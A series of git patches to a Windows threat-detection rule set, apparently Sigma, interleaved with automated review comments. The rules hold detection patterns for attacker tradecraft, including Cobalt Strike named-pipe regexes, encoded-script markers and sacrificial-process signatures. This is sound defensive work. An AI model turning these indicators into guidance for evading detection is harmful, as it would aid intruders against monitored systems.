@@ -33,10 +33,13 @@ detection: - ' -noprofile ' - ' -decode ' - ' -enc ' - condition: selection and selection_destination + - Destination|contains: + - 'WScript.Shell' + - 'System.Security.Cryptography.FromBase64Transform' + condition: selection_destination fields: - - CommandLine - - ParentCommandLine + - User + - Operation falsepositives: - Administrative scripts level: high From 2dbbaf01809d6e8ce77109f59b174a039f649c75 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 1 Sep 2021 14:00:55 +0200 Subject: [PATCH 0683/1367] fix missing char in date --- .../process_creation_alternate_data_streams.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_creation_alternate_data_streams.yml b/rules/windows/process_creation/process_creation_alternate_data_streams.yml index 643417f3..7460de70 100644 --- a/rules/windows/process_creation/process_creation_alternate_data_streams.yml +++ b/rules/windows/process_creation/process_creation_alternate_data_streams.yml @@ -2,7 +2,7 @@ title: Execute From Alternate Data Streams id: 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c status: experimental author: frack113 -date: 2021/0901 +date: 2021/09/01 description: Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md From 1aac21ba791a514e7ad3dac814765d56189f8a34 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 14:03:42 +0200 Subject: [PATCH 0684/1367] fix: single list item issue --- rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml index 03338301..84a04fba 100644 --- a/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml 
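Review bot: The new `Destination|contains:` list item makes a bare `WScript.Shell` reference sufficient to trigger at `level: high`, and that object is the standard way a legitimate ActiveScript consumer runs a command, so this match is far broader than the `|contains|all` combinations above it. Pairing it with a second indicator via `|contains|all`, or moving the single-string matches into a separate lower-level rule, would keep this rule's severity meaningful; `falsepositives: Administrative scripts` already acknowledges the exposure. The removal of `selection: EventID: 20` in the previous hunk looks behaviourally neutral for Sysmon, where `Destination` is, as far as the event schema goes, only populated on event 20, but the rule now relies on the field name alone for that scoping.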
+++ b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml @@ -15,7 +15,7 @@ logsource: category: wmi_event detection: selection_destination: - - Destination|base64offset|contains: + Destination|base64offset|contains: - 'WriteProcessMemory' - 'This program cannot be run in DOS mode' - 'This program must be run under Win32' From deefcaa8ac7e2b9eea10a725808f3e9ba1e35068 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 1 Sep 2021 14:33:27 +0200 Subject: [PATCH 0685/1367] fix: prevent possible FPs with the respective command only used as the last parameter --- .../win_bad_opsec_sacrificial_processes.yml | 4 ++++ rules/windows/process_creation/win_susp_procs_req_dlls.yml | 6 ++++++ 2 files changed, 10 insertions(+) diff --git a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml index bce196ae..efe436c9 100644 --- a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml +++ b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml @@ -4,6 +4,7 @@ status: experimental description: 'Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.' author: 'Oleg Kolesnikov @securonix invrep_de, oscd.community' date: 2020/10/23 +modified: 2021/09/01 references: - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/ - https://www.cobaltstrike.com/help-opsec @@ -16,6 +17,9 @@ logsource: product: windows detection: selection: + Image|endswith: + - '\WerFault.exe' + - '\rundll32.exe' CommandLine|endswith: - '\WerFault.exe' - '\rundll32.exe' 
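Review bot: Adding `Image|endswith:` alongside `CommandLine|endswith:` correctly ties the argument-less command line to the same binary, but `CommandLine|endswith: '\rundll32.exe'` still misses the quoted form `"C:\Windows\System32\rundll32.exe"` that some launchers produce, where the line ends with `"`; adding the quoted variants (e.g. `'\rundll32.exe"'`) to the list would close that gap. Whether the quoted form occurs for these parents depends on the launching tool, so it is worth validating against collected telemetry before widening. The same pattern applies to win_susp_procs_req_dlls.yml in this commit and to the unified rule in the next commit on this page.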
diff --git a/rules/windows/process_creation/win_susp_procs_req_dlls.yml b/rules/windows/process_creation/win_susp_procs_req_dlls.yml index d52158f8..dcbadaf4 100644 --- a/rules/windows/process_creation/win_susp_procs_req_dlls.yml +++ b/rules/windows/process_creation/win_susp_procs_req_dlls.yml @@ -10,11 +10,17 @@ references: - https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback author: Florian Roth date: 2021/05/27 +modified: 2021/09/01 logsource: category: process_creation product: windows detection: selection: + Image|endswith: + - '\rundll32.exe' + - '\regsvcs.exe' + - '\regasm.exe' + - '\regsvr32.exe' CommandLine|endswith: - '\rundll32.exe' - '\regsvcs.exe' From ae9966bdccbaf25e8e2be224424edf99ed9c1494 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 1 Sep 2021 14:48:32 +0200 Subject: [PATCH 0686/1367] fix: unifying two overlapping rules --- .../win_bad_opsec_sacrificial_processes.yml | 22 ++++++++++- .../win_susp_procs_req_dlls.yml | 39 ------------------- 2 files changed, 20 insertions(+), 41 deletions(-) delete mode 100644 rules/windows/process_creation/win_susp_procs_req_dlls.yml diff --git a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml index efe436c9..8fc81f3a 100644 --- a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml +++ b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml 
@@ -2,12 +2,17 @@ title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments id: a7c3d773-caef-227e-a7e7-c2f13c622329 status: experimental description: 'Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.' -author: 'Oleg Kolesnikov @securonix invrep_de, oscd.community' +author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard date: 2020/10/23 modified: 2021/09/01 references: - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/ - https://www.cobaltstrike.com/help-opsec + - https://twitter.com/CyberRaiju/status/1251492025678983169 + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32 + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32 + - https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool + - https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback tags: - attack.defense_evasion - attack.t1085 # an old one @@ -20,10 +25,23 @@ detection: Image|endswith: - '\WerFault.exe' - '\rundll32.exe' + - '\regsvcs.exe' + - '\regasm.exe' + - '\regsvr32.exe' CommandLine|endswith: - '\WerFault.exe' - '\rundll32.exe' - condition: selection + - '\regsvcs.exe' + - '\regasm.exe' + - '\regsvr32.exe' + filter1: + ParentImage|contains: + - '\AppData\Local\' + - '\Microsoft\Edge\' + condition: selection and not filter1 +fields: + - ParentImage + - ParentCommandLine falsepositives: - Unlikely level: high 
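Review bot: `filter1` excludes every process whose parent runs under `\AppData\Local\`, which is also a common location for user-dropped binaries; a tool staged there that spawns a bare rundll32.exe or regsvr32.exe is now silently filtered, so the exclusion undercuts the rule's own premise. Narrowing the filter to the specific legitimate parent paths that caused false positives (the `\Microsoft\Edge\` entry already has that shape) would keep the benign cases out without blanket-excluding the user profile. `falsepositives: Unlikely` also reads as stale now that a filter was needed; the deleted rule's "Possible but rare" is the more honest statement. The `selection:` key of the second hunk sits above it, so the selection head is not visible here.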
diff --git a/rules/windows/process_creation/win_susp_procs_req_dlls.yml b/rules/windows/process_creation/win_susp_procs_req_dlls.yml deleted file mode 100644 index dcbadaf4..00000000 --- a/rules/windows/process_creation/win_susp_procs_req_dlls.yml +++ /dev/null @@ -1,39 +0,0 @@ -title: Suspicious Process Start Without DLL -id: f5647edc-a7bf-4737-ab50-ef8c60dc3add -description: Detects suspicious start of program that usually requires a DLL as parameter, which can be a sign of process injection or hollowing activity -status: experimental -references: - - https://twitter.com/CyberRaiju/status/1251492025678983169 - - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32 - - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32 - - https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool - - https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback -author: Florian Roth -date: 2021/05/27 -modified: 2021/09/01 -logsource: - category: process_creation - product: windows -detection: - selection: - Image|endswith: - - '\rundll32.exe' - - '\regsvcs.exe' - - '\regasm.exe' - - '\regsvr32.exe' - CommandLine|endswith: - - '\rundll32.exe' - - '\regsvcs.exe' - - '\regasm.exe' - - '\regsvr32.exe' - filter1: - ParentImage|contains: - - '\AppData\Local\' - - '\Microsoft\Edge\' - condition: selection and not filter1 -fields: - - ParentImage - - ParentCommandLine -falsepositives: - - Possible but rare -level: high From 0b38237dbff215b899cf33ee134491a13601f541 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 1 Sep 2021 15:38:29 +0200 Subject: [PATCH 0687/1367] fix: add relation to now obsolete rule --- .../process_creation/win_bad_opsec_sacrificial_processes.yml | 3 +++ 1 file changed, 3 insertions(+) 
diff --git a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml index 8fc81f3a..0b3481e0 100644 --- a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml +++ b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml @@ -1,6 +1,9 @@ title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments id: a7c3d773-caef-227e-a7e7-c2f13c622329 status: experimental +related: + - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add + type: obsoletes description: 'Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.' author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard date: 2020/10/23 From 2f7f050ad811640809164b42e8ffc231b53e3952 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 16:32:27 +0200 Subject: [PATCH 0688/1367] fix: removed tags --- .../pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml index 1d4e7e24..44954d47 100644 --- a/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml +++ b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml @@ -6,10 +6,6 @@ references: - https://github.com/RiccardoAncarani/LiquidSnake date: 2021/09/01 author: Florian Roth -tags: - - attack.defense_evasion - - attack.privilege_escalation - - attack.t1055 logsource: product: windows category: pipe_created 
From b0c2d7b75ae24dc49bbd860f6a7ce2698cd21154 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 16:34:50 +0200 Subject: [PATCH 0689/1367] fix: tags for WMI / execution / persistence --- rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml index 84a04fba..5388798c 100644 --- a/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml +++ b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml @@ -7,9 +7,10 @@ references: - https://github.com/RiccardoAncarani/LiquidSnake date: 2021/09/01 tags: - - attack.t1086 # an old one - attack.execution - - attack.t1059.005 + - attack.t1047 + - attack.persistence + - attack.t1546.003 logsource: product: windows category: wmi_event From e83ee55573e0adf9cc15884b74036da1effe149e Mon Sep 17 00:00:00 2001 From: Konstantin Klinger Date: Wed, 1 Sep 2021 17:05:36 +0200 Subject: [PATCH 0690/1367] remove duplicate --- rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index 150b8dda..429b3016 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml @@ -41,7 +41,6 @@ detection: - PipeName|re: '\\f53f[0-9a-f]{2}' - PipeName|re: '\\rpc_[0-9a-f]{2}' - PipeName|re: '\\spoolss_[0-9a-f]{2}' - - PipeName|re: '\\windows\.update\.manager[0-9a-f]{3}' - PipeName|re: '\\Winsock2\\CatalogChangeListener-[0-9a-f]{3}-0,' condition: selection falsepositives: From 457da818a40e8bd8f6174de94a0cdbae433d5181 Mon Sep 17 00:00:00 2001 
From: Konstantin Klinger Date: Wed, 1 Sep 2021 17:06:55 +0200 Subject: [PATCH 0691/1367] regex optimisations --- .../pipe_created/sysmon_mal_cobaltstrike_re.yml | 15 +++++---------- 1 file changed, 5 insertions(+), 10 deletions(-) diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index 429b3016..cd4c42d0 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml 
@@ -18,20 +18,15 @@ logsource: definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' detection: selection: - - PipeName|re: '\\mojo\.5688\.8052\.183894939787088877[0-9a-f]{2}' - - PipeName|re: '\\mojo\.5688\.8052\.35780273329370473[0-9a-f]{2}' - - PipeName|re: '\\wkssvc[0-9a-f]{2}' - - PipeName|re: '\\wkssvc_[0-9a-f]{2}' + - PipeName|re: '\\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' + - PipeName|re: '\\wkssvc_?[0-9a-f]{2}' - PipeName|re: '\\ntsvcs[0-9a-f]{2}' - PipeName|re: '\\DserNamePipe[0-9a-f]{2}' - PipeName|re: '\\SearchTextHarvester[0-9a-f]{2}' - - PipeName|re: '\\mypipe\-f[0-9a-f]{2}' - - PipeName|re: '\\mypipe\-h[0-9a-f]{2}' - - PipeName|re: '\\windows\.update\.manager[0-9a-f]{2}' - - PipeName|re: '\\windows\.update\.manager[0-9a-f]{3}' + - PipeName|re: '\\mypipe\-(?:f|h)[0-9a-f]{2}' + - PipeName|re: '\\windows\.update\.manager[0-9a-f]{2,3}' - PipeName|re: '\\ntsvcs_[0-9a-f]{2}' - - PipeName|re: '\\scerpc_[0-9a-f]{2}' - - PipeName|re: '\\scerpc[0-9a-f]{2}' + - PipeName|re: '\\scerpc_?[0-9a-f]{2}' - PipeName|re: '\\PGMessagePipe[0-9a-f]{2}' - PipeName|re: '\\MsFteWds[0-9a-f]{2}' - PipeName|re: '\\f4c3[0-9a-f]{2}' From 1ba0a7c7a3557a43d87e14b3bd1d3917f24195c8 Mon Sep 17 00:00:00 2001 
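Review bot: Style nit on the new `mypipe` line: `(?:f|h)` alternates two single characters, so a character class reads more directly and avoids the group — `- PipeName|re: '\\mypipe\-[fh][0-9a-f]{2}'`. The `_?` and `{2,3}` merges look equivalent to the pairs they replace, and the `\\` prefix survives YAML single quoting as a literal backslash for the regex. Since this hunk changes matching logic, the rule's modification date should be bumped in the same commit so consumers can see the rule changed.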
From: frack113 Date: Wed, 1 Sep 2021 19:38:35 +0200 Subject: [PATCH 0692/1367] add missing tags --- .../windows/file_event/sysmon_tsclient_filewrite_startup.yml | 3 +++ rules/windows/other/win_defender_amsi_trigger.yml | 5 ++++- rules/windows/other/win_defender_threat.yml | 3 +++ .../windows/registry_event/sysmon_reg_vbs_payload_stored.yml | 3 +++ .../registry_event/sysmon_sysinternals_eula_accepted.yml | 3 +++ 5 files changed, 16 insertions(+), 1 deletion(-) diff --git a/rules/windows/file_event/sysmon_tsclient_filewrite_startup.yml b/rules/windows/file_event/sysmon_tsclient_filewrite_startup.yml index c171dcdf..d11fd2b3 100755 --- a/rules/windows/file_event/sysmon_tsclient_filewrite_startup.yml +++ b/rules/windows/file_event/sysmon_tsclient_filewrite_startup.yml @@ -15,3 +15,6 @@ detection: falsepositives: - unknown level: high +tags: + - attack.command_and_control + - attack.t1219 \ No newline at end of file diff --git a/rules/windows/other/win_defender_amsi_trigger.yml b/rules/windows/other/win_defender_amsi_trigger.yml index f872bf22..2478a55c 100644 --- a/rules/windows/other/win_defender_amsi_trigger.yml +++ b/rules/windows/other/win_defender_amsi_trigger.yml @@ -17,4 +17,7 @@ detection: condition: selection falsepositives: - unlikely -level: high \ No newline at end of file +level: high +tags: + - attack.execution + - attack.t1059 \ No newline at end of file diff --git a/rules/windows/other/win_defender_threat.yml b/rules/windows/other/win_defender_threat.yml index 9721af7b..76413e11 100644 --- a/rules/windows/other/win_defender_threat.yml +++ b/rules/windows/other/win_defender_threat.yml @@ -20,3 +20,6 @@ detection: falsepositives: - unlikely level: high +tags: + - attack.execution + - attack.t1059 \ No newline at end of file diff --git a/rules/windows/registry_event/sysmon_reg_vbs_payload_stored.yml b/rules/windows/registry_event/sysmon_reg_vbs_payload_stored.yml index 0104e1bf..058178fc 100644 
--- a/rules/windows/registry_event/sysmon_reg_vbs_payload_stored.yml +++ b/rules/windows/registry_event/sysmon_reg_vbs_payload_stored.yml @@ -29,3 +29,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.persistence + - attack.t1547.001 \ No newline at end of file diff --git a/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml b/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml index 717e6b93..e526a09c 100755 --- a/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml +++ b/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml @@ -11,6 +11,9 @@ falsepositives: - Legitimate use of SysInternals tools - Programs that use the same Registry Key level: low +tags: + - attack.resource_development + - attack.t1588.002 --- logsource: product: windows From e0cd35261cd47bc50ae84394ddef8f04a606c21e Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 1 Sep 2021 20:01:03 +0200 Subject: [PATCH 0693/1367] add missing tags --- .../process_creation/win_susp_cmd_shadowcopy_access.yml | 3 +++ .../windows/process_creation/win_susp_rundll32_inline_vbs.yml | 3 +++ .../process_creation/win_susp_screenconnect_access.yml | 3 +++ rules/windows/process_creation/win_susp_userinit_child.yml | 3 +++ .../registry_event/sysmon_suspicious_keyboard_layout_load.yml | 4 +++- 5 files changed, 15 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml index 319eef8e..9b475340 100644 --- a/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml +++ b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml @@ -17,3 +17,6 @@ detection: falsepositives: - Some rare backup scenarios level: medium +tags: + - attack.impact + - attack.t1490 \ No newline at end of file 
diff --git a/rules/windows/process_creation/win_susp_rundll32_inline_vbs.yml b/rules/windows/process_creation/win_susp_rundll32_inline_vbs.yml index e85f144e..7018898a 100644 --- a/rules/windows/process_creation/win_susp_rundll32_inline_vbs.yml +++ b/rules/windows/process_creation/win_susp_rundll32_inline_vbs.yml @@ -20,3 +20,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.defense_evasion + - attack.t1055 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_screenconnect_access.yml b/rules/windows/process_creation/win_susp_screenconnect_access.yml index 0f6f6259..d146d9dc 100644 --- a/rules/windows/process_creation/win_susp_screenconnect_access.yml +++ b/rules/windows/process_creation/win_susp_screenconnect_access.yml @@ -21,3 +21,6 @@ detection: falsepositives: - Legitimate use by administrative staff level: high +tags: + - attack.initial_access + - attack.t1133 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_userinit_child.yml b/rules/windows/process_creation/win_susp_userinit_child.yml index 1b22804e..0c6693f1 100644 --- a/rules/windows/process_creation/win_susp_userinit_child.yml +++ b/rules/windows/process_creation/win_susp_userinit_child.yml @@ -24,3 +24,6 @@ fields: falsepositives: - Administrative scripts level: medium +tags: + - attack.defense_evasion + - attack.t1055 \ No newline at end of file diff --git a/rules/windows/registry_event/sysmon_suspicious_keyboard_layout_load.yml b/rules/windows/registry_event/sysmon_suspicious_keyboard_layout_load.yml index 0cd426a5..a7842bbe 100755 --- a/rules/windows/registry_event/sysmon_suspicious_keyboard_layout_load.yml +++ b/rules/windows/registry_event/sysmon_suspicious_keyboard_layout_load.yml 
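Review bot: The `attack.t1055` tag added to win_susp_rundll32_inline_vbs.yml (and again to win_susp_userinit_child.yml in this commit) maps to Process Injection, which does not obviously describe an inline VBScript passed to rundll32; the dedicated sub-technique for rundll32 proxy execution is T1218.011, so `  - attack.t1218.011` under `attack.defense_evasion` appears to be the closer mapping. I cannot see the detection body of either rule here, so please confirm against the rule's selection before changing. Wrong tags are cheap to fix now and expensive once dashboards and coverage maps key on them.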
@@ -25,4 +25,6 @@ detection: falsepositives: - "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" level: medium - +tags: + - attack.resource_development + - attack.t1588.002 From 5e87970c77ebf089b5ca96157bc6132694bda323 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 09:47:54 +0200 Subject: [PATCH 0694/1367] add powershell_store_file_in_alternate_data_stream.yml --- ...ll_store_file_in_alternate_data_stream.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml diff --git a/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml b/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml new file mode 100644 index 00000000..cfe46b78 --- /dev/null +++ b/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml @@ -0,0 +1,28 @@ +title: Powershell Store File In Alternate Data Stream +id: a699b30e-d010-46c8-bbd1-ee2e26765fe9 +status: experimental +author: frack113 +date: 2021/09/02 +description: Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md +tags: + - attack.defense-evasion + - attack.t1564.004 +logsource: + product: windows + service: powershell + definition: EnableScriptBlockLogging must be set to enable +detection: + selection_id: + EventID: 4104 + selection_compspec: + ScriptBlockText|contains|all: + - 'Start-Process' + - '-FilePath "$env:comspec" ' + - '-ArgumentList ' + - '>' + condition: selection_id and selection_compspec +falsepositives: + - Unknown +level: medium \ No newline at end of file From 25c6f69ea3edd8d7251e6a69664c7cc37471fb1a Mon Sep 17 00:00:00 2001 
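Review bot: The new powershell_store_file_in_alternate_data_stream.yml selection contains no alternate-data-stream indicator at all: the four `contains|all` terms match any `Start-Process -FilePath "$env:comspec" -ArgumentList ... >` redirection to a regular file, so the title and description promise more than `selection_compspec` checks. Either include the stream-target shape from the referenced Atomic test (which I cannot see here) or narrow the description to what is actually matched. The term `'-FilePath "$env:comspec" '` is also sensitive to quote style and whitespace, so a short `definition`/description note on that brittleness would help maintainers tune it. Consider naming the selection for what it matches, e.g. `selection_comspec_redirect`.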
From: frack113 Date: Thu, 2 Sep 2021 09:51:44 +0200 Subject: [PATCH 0695/1367] update references --- rules/windows/powershell/powershell_ntfs_ads_access.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/powershell/powershell_ntfs_ads_access.yml b/rules/windows/powershell/powershell_ntfs_ads_access.yml index 0d38b0d7..1c6f3018 100644 --- a/rules/windows/powershell/powershell_ntfs_ads_access.yml +++ b/rules/windows/powershell/powershell_ntfs_ads_access.yml @@ -4,6 +4,7 @@ status: experimental description: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging. references: - http://www.powertheshell.com/ntfsstreams/ + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md tags: - attack.defense_evasion - attack.t1564.004 From 6f1f70ca5e340b8884b0a020978a1bc79639acc1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 09:59:19 +0200 Subject: [PATCH 0696/1367] Add missing tags --- .../windows/process_creation/win_malware_conti_shadowcopy.yml | 3 +++ rules/windows/process_creation/win_malware_dtrack.yml | 3 +++ 2 files changed, 6 insertions(+) diff --git a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml index 3292bcba..9c07e2c0 100644 --- a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml +++ b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml @@ -23,3 +23,6 @@ detection: falsepositives: - Some rare backup scenarios level: medium +tags: + - attack.impact + - attack.t1490 \ No newline at end of file diff --git a/rules/windows/process_creation/win_malware_dtrack.yml b/rules/windows/process_creation/win_malware_dtrack.yml index e5e429be..3d44a016 100644 --- a/rules/windows/process_creation/win_malware_dtrack.yml +++ b/rules/windows/process_creation/win_malware_dtrack.yml 
@@ -21,3 +21,6 @@ fields: falsepositives: - Unlikely level: critical +tags: + - attack.impact + - attack.t1490 \ No newline at end of file From 90e673e5ac8b9049be8253b679b3b9a50e6d6d62 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 10:17:50 +0200 Subject: [PATCH 0697/1367] fix invalid tags --- .../powershell_store_file_in_alternate_data_stream.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml b/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml index cfe46b78..070ace3c 100644 --- a/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml +++ b/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml @@ -7,7 +7,7 @@ description: Storing files in Alternate Data Stream (ADS) similar to Astaroth ma references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md tags: - - attack.defense-evasion + - attack.defense_evasion - attack.t1564.004 logsource: product: windows From f4a5df67ae44492fce0da860f1d7ab4b434b6e8f Mon Sep 17 00:00:00 2001 From: phantinuss Date: Thu, 2 Sep 2021 10:28:01 +0200 Subject: [PATCH 0698/1367] further narrowing down of the selection, therefore removing the filter --- .../win_bad_opsec_sacrificial_processes.yml | 28 ++++++++++++------- 1 file changed, 18 insertions(+), 10 deletions(-) diff --git a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml index 0b3481e0..2d85255b 100644 --- a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml +++ b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml 
@@ -24,24 +24,32 @@ logsource: category: process_creation product: windows detection: - selection: + selection1: Image|endswith: - '\WerFault.exe' - - '\rundll32.exe' - - '\regsvcs.exe' - - '\regasm.exe' - - '\regsvr32.exe' CommandLine|endswith: - '\WerFault.exe' + selection2: + Image|endswith: - '\rundll32.exe' + CommandLine|endswith: + - '\rundll32.exe' + selection3: + Image|endswith: - '\regsvcs.exe' + CommandLine|endswith: + - '\regsvcs.exe' + selection4: + Image|endswith: - '\regasm.exe' + CommandLine|endswith: + - '\regasm.exe' + selection5: + Image|endswith: - '\regsvr32.exe' - filter1: - ParentImage|contains: - - '\AppData\Local\' - - '\Microsoft\Edge\' - condition: selection and not filter1 + CommandLine|endswith: + - '\regsvr32.exe' + condition: 1 of selection* fields: - ParentImage - ParentCommandLine From 5cb6eed52e27f5b3f082055ced15172ff79b43a8 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Thu, 2 Sep 2021 14:09:03 +0200 Subject: [PATCH 0699/1367] fix: remove single value lists --- .../win_bad_opsec_sacrificial_processes.yml | 30 +++++++------------ 1 file changed, 10 insertions(+), 20 deletions(-) diff --git a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml index 2d85255b..f3f2deef 100644 --- a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml +++ b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml 
